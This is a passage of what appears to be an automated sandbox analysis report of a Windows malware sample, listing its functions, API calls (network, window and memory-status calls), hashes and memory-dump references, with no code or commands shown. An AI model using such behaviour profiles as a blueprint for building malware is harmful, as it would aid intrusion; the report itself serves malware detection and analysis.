                                          • Opcode Fuzzy Hash: 947003dbb3b393d6b2b10dc5457bc6fa66b94f77915c7fb8d12e8040c33e1964
                                          • Instruction Fuzzy Hash: 30E04F766423219FD7245FB26E0DB577BA8AF50797F094C28E245EA090DA3484498B62
                                          Function 00E12187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E12187
                                          • GetDC.USER32(00000000), ref: 00E12191
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E121B1
                                          • ReleaseDC.USER32(?), ref: 00E121D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: c1de8de3446e9b60da24a68a3906e56c99dbaa59ef759bdb4c088709c49da562
                                          • Instruction ID: db693cacc5ac8142d8c7b4253e0a27968056b860bdfaa09175c761b628dc0bf9
                                          • Opcode Fuzzy Hash: c1de8de3446e9b60da24a68a3906e56c99dbaa59ef759bdb4c088709c49da562
                                          • Instruction Fuzzy Hash: 00E0E575900214EFDB059F61C808A9D7BB1EB4C352F10882AF95AA7260DBB881459F90
                                          Function 00E1219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E1219B
                                          • GetDC.USER32(00000000), ref: 00E121A5
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E121B1
                                          • ReleaseDC.USER32(?), ref: 00E121D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 403d330d11f354d64b9ac04a37dbfa2bae930e9673761c41ad671d67194761d4
                                          • Instruction ID: 80a2a1b0809ea79fb16f6a83f452a545b64052260bfd0b21c16c9cc05460f484
                                          • Opcode Fuzzy Hash: 403d330d11f354d64b9ac04a37dbfa2bae930e9673761c41ad671d67194761d4
                                          • Instruction Fuzzy Hash: C8E0E575800204AFCB059F61C80869D7BA1EB4C312F108825F95AA7260DBB891459F90
                                          Function 00DD63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2291192146
                                          • Opcode ID: 0cc855a2bf6c27cb91851a3190b3f0056c780f589ff8279439ef913ed1b51408
                                          • Instruction ID: 73ce8901591d3eeeb6a1b5b5c85c97c3acc0db37a5093763151d3e951e2066ca
                                          • Opcode Fuzzy Hash: 0cc855a2bf6c27cb91851a3190b3f0056c780f589ff8279439ef913ed1b51408
                                          • Instruction Fuzzy Hash: 29B19D719042099ACF24EFA8C8919EEBBB4FF44310F544167E942A7395EB30DE85CBB1
                                          Function 00E3B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • __wcsnicmp.LIBCMT ref: 00E3B298
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E3B361
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: 4c7e9caee754171b979797141f78dd10b04d7a42fc477eac9abe15386f8bf95b
                                          • Instruction ID: b266261b8f09804f9dda180a172c17a823f67dfa880ee5a7c8faf83f08261137
                                          • Opcode Fuzzy Hash: 4c7e9caee754171b979797141f78dd10b04d7a42fc477eac9abe15386f8bf95b
                                          • Instruction Fuzzy Hash: E1616175A00215AFCB14DF94C895EAEBBF4EF08310F15515AFA46BB351DB70AE44CB60
                                          Function 00DE2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00DE2AC8
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DE2AE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: d21a7e4aa374d54bfac83ecd73f88005726265f925f81f469fb7971feb397868
                                          • Instruction ID: 14369bfc1129d6946878c4e554e3270be64a94a851ed0c2337aff69ff0d311a2
                                          • Opcode Fuzzy Hash: d21a7e4aa374d54bfac83ecd73f88005726265f925f81f469fb7971feb397868
                                          • Instruction Fuzzy Hash: 815156724187449BD320AF11DC96BAFBBECFF84310F42885EF1D9512A1DB318969CB26
                                          Function 00E399BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD506B: __fread_nolock.LIBCMT ref: 00DD5089
                                          • _wcscmp.LIBCMT ref: 00E39AAE
                                          • _wcscmp.LIBCMT ref: 00E39AC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 4b3763c510cf93a808f4bbd99bad2ceacb81eb53b79d1d50995ca8db9a2024e7
                                          • Instruction ID: 51e0da6fb319e7fde790257fda1e2715afaf97c48395f66d23efed07a4a74cf0
                                          • Opcode Fuzzy Hash: 4b3763c510cf93a808f4bbd99bad2ceacb81eb53b79d1d50995ca8db9a2024e7
                                          • Instruction Fuzzy Hash: F541B371A00609BBDF20AAA0DC46FEFBBB9DF45714F01406AF904B7285DBB59A04C7B1
                                          Function 00E42882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E42892
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E428C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 3cca92de1655cdb082cc961276eb7f823881a0ff9e4cdd04029cf1a69073fe88
                                          • Instruction ID: 7eca20e1a3529956898a40932f453f32be6b743c35d105b15467aacff95ee631
                                          • Opcode Fuzzy Hash: 3cca92de1655cdb082cc961276eb7f823881a0ff9e4cdd04029cf1a69073fe88
                                          • Instruction Fuzzy Hash: 04311A71C01119AFCF11AFA1DC85EEEBFB9FF08340F10406AF915A6265EA315A56DB70
                                          Function 00E56CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E56D86
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E56DC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 41034be7a335a8859af4951317acff70bbc1f55fe9ea8bb0ef4633f71f9807d3
                                          • Instruction ID: 7abf9e0e8480e4fa6d15630429c692fb4716fd530aad1d56cba3840c94b65593
                                          • Opcode Fuzzy Hash: 41034be7a335a8859af4951317acff70bbc1f55fe9ea8bb0ef4633f71f9807d3
                                          • Instruction Fuzzy Hash: 12317071210604AEDB109F64CC40AFB77B9FF48725F50A91AFD95A7190DB31AC95CB60
                                          Function 00E32D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E32E00
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E32E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 58f58bc4e3bb8e7e093c3c210c0dba24b19a4ac24c940952b52333c4b0500c39
                                          • Instruction ID: 89d3236da693d746416a8b346c800bcc59b55939db01164efaebdad82739f711
                                          • Opcode Fuzzy Hash: 58f58bc4e3bb8e7e093c3c210c0dba24b19a4ac24c940952b52333c4b0500c39
                                          • Instruction Fuzzy Hash: 9F31D731600309ABEB268F5AC84A7AEBFF9EF05354F14542EEAC5B61A0D7709944CB50
                                          Function 00E56943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E569D0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E569DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 07e26dd3d7ef3fbf22f2017f7926d053e207fbb38848d9f7fe9570a7755e39ba
                                          • Instruction ID: e1d1f2772e7034da87e42857971dcc6ce7b7fa1d3f0195e819561301d199e2d1
                                          • Opcode Fuzzy Hash: 07e26dd3d7ef3fbf22f2017f7926d053e207fbb38848d9f7fe9570a7755e39ba
                                          • Instruction Fuzzy Hash: E711E2712002086FEF119E24CC80EEB37AAEBC93A9F501525FD58AB2A0D6719C5587A0
                                          Function 00E56E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00E56EE0
                                          • GetSysColor.USER32(00000012), ref: 00E56EFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: f96aa7fabc8f12829f9f517ca278600cf0ba33133032f11d4ff9e27a9fe0d250
                                          • Instruction ID: 1ae51a7a42009dba7adbb8235d82e5bd1c6a411ad2f4eb98aa1f4270761f8e8f
                                          • Opcode Fuzzy Hash: f96aa7fabc8f12829f9f517ca278600cf0ba33133032f11d4ff9e27a9fe0d250
                                          • Instruction Fuzzy Hash: AA215972A10209AFDB04DFA8CD45AEA7BB8FB08315F005A29FD55E3250E734E8659B60
                                          Function 00E56B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E56C11
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E56C20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 453529adafa6cb58db8dfc7e56559cf04dd5ac44bccef54c4653a615d1b3bdc6
                                          • Instruction ID: c1ec064f46f583550ece492a3cbb86b2e2eb60b39933ca239a36e7b2dfb3723d
                                          • Opcode Fuzzy Hash: 453529adafa6cb58db8dfc7e56559cf04dd5ac44bccef54c4653a615d1b3bdc6
                                          • Instruction Fuzzy Hash: 8C11BF71500208AFEF508E64DC41AEB3769EB0437AF905B25FD60E71E0C771DC989760
                                          Function 00E32E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E32F11
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E32F30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: d62cb5840a4752c932bc04f1b8d19f136c6bab7233925560a3bee03c1eecbcbe
                                          • Instruction ID: 06c1e4fa1cffc2d6748706acbbd16b865cbc707b012afb210b2f099f696bb702
                                          • Opcode Fuzzy Hash: d62cb5840a4752c932bc04f1b8d19f136c6bab7233925560a3bee03c1eecbcbe
                                          • Instruction Fuzzy Hash: 2311E231E01214ABCB35DB59DC49BA97BB9EB01358F0510AAEA84B72A0D7B0EE04C791
                                          Function 00E424CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E42520
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E42549
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 668dbf0f53301fac5256c7eb83f9d87360f3c4460dbdcae123c9d5d89910a674
                                          • Instruction ID: a2563fb505a98abc7b12e85fa70723fa17f6903da519675c1189ff2142232e2f
                                          • Opcode Fuzzy Hash: 668dbf0f53301fac5256c7eb83f9d87360f3c4460dbdcae123c9d5d89910a674
                                          • Instruction Fuzzy Hash: 61110270501225BEDB289F62AC98EFBFF68FF06355F50912EFA0567040D2B46984DAF1
                                          Function 00E480A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E480C8,?,00000000,?,?), ref: 00E48322
                                          • inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • htons.WS2_32(00000000), ref: 00E48108
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          • Opcode ID: 6e87c67187a6bba7d59bf6ad006b055ee0f7e3ad2d09ace4feffafa7a8550328
